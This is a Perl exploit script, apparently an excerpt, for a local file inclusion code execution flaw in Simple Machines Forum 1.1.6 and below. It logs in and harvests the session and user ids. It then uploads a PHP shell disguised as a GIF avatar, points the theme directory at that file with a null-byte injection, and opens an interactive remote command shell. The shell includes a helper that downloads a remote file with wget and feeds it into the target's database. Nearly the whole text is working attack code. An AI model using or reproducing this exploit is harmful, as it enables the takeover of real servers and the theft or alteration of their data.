chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
chr(0x04).chr(0x00).chr(0x3b).chr(0x00);
## Logging in
my $ret = $ua->post("$parms{s}/index.php?action=login2",
[
user => $parms{u},
passwrd => $parms{p},
cookielength => -1
]);
## Getting id, sid and checking to see if we're logged on
$ret = $ua->get("$parms{s}/index.php?action=profile");
die "[!!] Wrong username/password\n"
unless $ret->as_string !~ /The user whose profile you are trying to view does not exist/;
die "[!!] Error getting session id\n"
unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;
die "[!!] Error getting id\n"
unless my($id) = $ret->as_string =~ /u=(\d+);/;
print "[ii] Session ID = $sid\n".
"[ii] User Id = $id\n" if $parms{d};
## Checking for shell
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => "echo expl0ited");
&shell
if $ret->as_string =~ /expl0ited/;
$ret = $ua->request(
POST "$parms{s}/index.php?action=profile2",
Content_Type => 'multipart/form-data',
Content =>
[
avatar_choice => "upload",
sc => $sid,
userID => $id,
sa => "forumProfile",
attachment =>
[
undef,
"expl0ited.gif",
Content => $shell,
"Content-Type" => "image/gif"
]
]);
## Updating Settings.php
$ret = $ua->get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif\%2500");
print "[ii] Uploaded a shell...\n"
if $parms{d};
shell();
## lulz @ this shit.
sub shell {
my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => '0998' );
($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---/s;
die "[!!] magic_quotes is turned on\n"
if (not defined $os or not defined $sh or $1 eq $id);
$sh = $sh ? "php" : "cmd";
$os = $os =~ /win/i ? "win32" : "unix";
do {
print "[$sh\@$os]\$ ";
$cmd = chomp (my $cmd = <STDIN>);
exit
unless $cmd !~ /^exit$/i;
if( ($file) = $cmd =~ /^savefile (.*?) / ) {
$cmd =~ s/savefile $1 //;
} else { undef $file; }
if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?) (.*?)$/ ) {
($base) = $full =~ /\/(.*?)$/;
$cmd = "cd attachments;wget $full; mysql --user=$user --password=$pass < $base; rm $base;";
}
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => $cmd);
$ret->as_string =~ /---1243---(.*?)---3421---/s;
print "$1\n";
if( defined $file ) {
open FILE, ">>", $file or die "[!!] Error writing to file; $!\n";
print FILE "Command Executed: $cmd\n".
"Host: $parms{s}\n$1\n";
close FILE;
}
} while( $cmd !~ /^exit$/i );
exit;
}
Simple Machines Forum versions 1.1.6 and below local file inclusion code execution exploit.